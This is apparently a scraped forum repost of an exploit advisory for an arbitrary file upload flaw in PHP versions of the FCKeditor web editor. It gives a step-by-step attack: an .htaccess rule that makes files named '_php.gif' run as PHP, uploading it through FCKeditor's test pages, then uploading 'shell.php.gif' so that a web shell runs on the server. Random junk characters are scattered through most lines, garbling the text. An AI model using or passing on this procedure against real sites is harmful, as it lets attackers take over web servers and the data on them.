FCKeditor所有php版本Upload上传漏洞
# T, q- J* T& v4 Y作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:071 c( Q! B% w& ~
减小字体 增大字体
$ i9 [# o' f4 Q2 y[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
1 ^ h1 ~6 r- s0 u# f+ K/ y[+] Date: 2011: @/ f7 ^8 C, p6 ]
[+] Author : sinesafe.cn
- Q: d/ B9 } h+ b) B[+] Website : WwW.sinesafe.cn& P: |/ p4 e, N8 c& U- ~
———————————————————* I2 J1 J" H! Y, O5 G
1.create a htaccess file:9 ] H- D0 j( A
code:1 r6 Q) K3 P9 I% Z( Z
<FilesMatch “_php.gif”>
+ ?: _6 E2 I# ]. A0 `SetHandler application/x-httpd-php
6 o: |% G+ f0 E' o+ V</FilesMatch>; o1 }6 |4 E, Q" }
s$ s% S- ~- H- Z* T# }* Q! M2.Now upload this htaccess with FCKeditor.
6 i* {; G/ J% [% C
, d; `. M6 U) n- I( n) khttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
- G! o5 \5 A2 N, `0 Q7 i2 N2 P. m% N- ]& m. L7 p: o
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
8 D0 {. D5 Z5 T1 C: C7 J% e) x) E* P' s
———————————————————————————————-
5 ?8 k% C# b/ N8 [+ ~) b0 o3.Now upload shell.php.gif with FCKeditor.. J3 B2 ^1 T; k2 V; E! i8 i6 Y
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
- b: n# E) K" ]3 h2 f, u% x5.http://www.sinesafe.cn/anything/shell_php.gif) z H5 c( }4 V4 `& s* A0 ~* U8 R
6.Now shell is available from server. |
0 T4 H, I7 g! `# }& z5 @8 s2 Z5 S
G2 y3 X2 D! n, O |
发表于 2013-10-27 17:25:21
收藏
支持
反对